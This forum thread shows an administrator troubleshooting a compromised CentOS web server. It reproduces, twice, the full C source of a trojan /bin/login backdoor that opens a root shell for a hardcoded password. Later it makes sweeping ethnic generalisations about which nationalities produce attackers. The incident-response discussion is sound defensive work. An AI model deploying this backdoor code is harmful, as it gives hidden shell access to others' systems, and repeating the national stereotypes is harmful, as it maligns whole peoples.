odd msg in /var/log/httpd/error_log

10 posts / 0 new
Last post
#1 Tue, 06/24/2008 - 09:18
ronald
ronald's picture

odd msg in /var/log/httpd/error_log

this is what it says:

mkdir: cannot create directory `3': File exists Quantifier follows nothing in regex; marked by <-- HERE in m/* <-- HERE

# DefacerBackRoot Discovered & Coded By rUnViRuS # World Defacers TeaM WD-Geekz: rUnViRuS -PaPipiycho - n0m3rcy gcc backpriv8.c -o backpriv8 Details It's a Simple Root Backdoor So, you can change: Details Time for enetering password Path to Demon, Trojan Password for Trojan Command Interpretator to exec Join with us to Get Prvi8 Exploit Priv8 Priv8 Priv8 Priv8 -------- ~~~~*~~~~ -------- #

*/ at r.pl line 20.

anyone has any ideas? it is the test server which no one has access to really. ssh is not on default port, ftp is closed. Only main server has access to it to make the backups and that goes by rsa key, not password.

Tue, 06/24/2008 - 09:37
andreychek

That's an interesting one!

It looks like the full script might be shown here:

http://www.kasbarg.com/topic.php?topic=201679

A few questions come to mind:

* Does the file /bin/.login exist?

* If you run a find on your system, do you see a file named &quot;backpriv8&quot; (find / -name backpriv8)?

* What is the &quot;r.pl&quot; script mentioned above in the error_log?

However, you might consider running something like chkrootkit or rkhunter on your box just to be safe, that's a rather unusual error to receive :-)
-Eric

Sun, 06/07/2009 - 07:25 (Reply to #2)
ronald
ronald's picture

hmm someone created a folder /3 in the /tmp dir...and placed a file in there.
Thats really odd as that server has no users other than me and I placed 2 of my own domains on there recently.

/tmp/3/ has a file r.pl
with
[code:1]# gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
*/
#include&lt;signal.h&gt;
#include&lt;stdio.h&gt;
#include&lt;string.h&gt;
#include&lt;unistd.h&gt;
#define REALPATH &quot;/bin/.login&quot;
#define TROJAN &quot;/bin/login&quot;
#define PASS &quot;worlddefacers&quot;

char **execute;
char passwd[7];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(5);
execute=argv;
*execute=TROJAN;

scanf(&quot;%s&quot;,passwd);

if(strcmp(passwd,PASS)==0) {
alarm(0);
execl(&quot;/bin/sh&quot;,&quot;/bin/sh&quot;,&quot;-i&quot;,0);
exit(0);
}
else
{
execv(REALPATH,execute);
exit(0);
}
}

void connection()
{
execv(REALPATH,execute);

exit(0);
}[/code:1]
there is no /bin/.login , a /bin/login is there however. backpriv8 gives no results on a search

Sun, 06/07/2009 - 07:25 (Reply to #3)
ronald
ronald's picture

hmm someone created a folder /3 in the /tmp dir...and placed a file in there.
Thats really odd as that server has no users other than me and I placed 2 of my own domains on there recently.

/tmp/3/ has a file r.pl
with
[code:1]# gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
*/
#include&lt;signal.h&gt;
#include&lt;stdio.h&gt;
#include&lt;string.h&gt;
#include&lt;unistd.h&gt;
#define REALPATH &quot;/bin/.login&quot;
#define TROJAN &quot;/bin/login&quot;
#define PASS &quot;worlddefacers&quot;

char **execute;
char passwd[7];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(5);
execute=argv;
*execute=TROJAN;

scanf(&quot;%s&quot;,passwd);

if(strcmp(passwd,PASS)==0) {
alarm(0);
execl(&quot;/bin/sh&quot;,&quot;/bin/sh&quot;,&quot;-i&quot;,0);
exit(0);
}
else
{
execv(REALPATH,execute);
exit(0);
}
}

void connection()
{
execv(REALPATH,execute);

exit(0);
}[/code:1]
there is no /bin/.login , a /bin/login is there however. backpriv8 gives no results on a search

Tue, 06/24/2008 - 10:26 (Reply to #4)
ronald
ronald's picture

the owner is Apache
chkrootkit detected nothing btw. so i assume nothing bad happened (yet)

Tue, 06/24/2008 - 10:29 (Reply to #5)
Joe
Joe's picture

This looks like an attempted (but probably failed) rootkit installation. There <i>is</i> definitely a security vulnerability on your system, though. Not doubt about that--random jackasses on the internet shouldn't be able to drop files onto your system (whether they escalate to root or not is another question entirely).

What are you running on your websites? (e.g. what applications?) Are they the latest versions?

--

Check out the forum guidelines!

Sun, 06/07/2009 - 07:25 (Reply to #6)
ronald
ronald's picture

this is centos 5.1 with webmin and virtualmin GPL and all is latest version.
I have only two domains of my own and they both have a index.html.
also the open_basedir is locked to the ${HOME}

On 1 of the sites i have sugarcrm installed but it is &quot;invisible&quot; as the index.html is called before sugarcrm's index.php.

Also the 2 domains are brandnew and the sugarcrm is also (like 4 days or so). I only used that server for daily backups till recently.

anyway I tried to do a yum upgrade but a few things did go wrong and had to reboot. I have no remote access now and the filesystem is corrupted (it says RUN fsck) which I did.

Hm interesting..
Im hanging a monitor on the box and first Ill get my main servers backups off of there.

Tue, 06/24/2008 - 11:02 (Reply to #7)
ronald
ronald's picture

right
this is (of course) my own fault.
I had a dangerous php file still on one of the domains to check for weaknesses. I forgot to take it off the server and it got indexed.

Some Turkish guys found it on the net and started toying with it.

Im just wondering why is it the Turkish are always on the first row when it comes to abusing other peoples belongings.... according to the logs there where like 5 of them messing around lol

/me deleting script..

Tue, 06/24/2008 - 12:48 (Reply to #8)
Joe
Joe's picture

It's not just the Turks. ;-)

Romania and many former soviet states, and China all have more than their fair share of crackers. I think it's a combination of a few factors: No extradition treaty with most western nations, reasonable technology infrastructure but not a lot of jobs to go around, and a history of oppression (which tends to break cultural taboos against dishonesty, since you have to lie daily to survive in an oppressive regime--it takes a generation or so of a reasonable level of freedom to recover from that). Not than I'm defending crackers and malware producers. It's just not too surprising where they mostly originate from.

--

Check out the forum guidelines!

Tue, 06/24/2008 - 10:22
andreychek

Hey Ronald,

Who's the owner of the r.pl file?
-Eric

Topic locked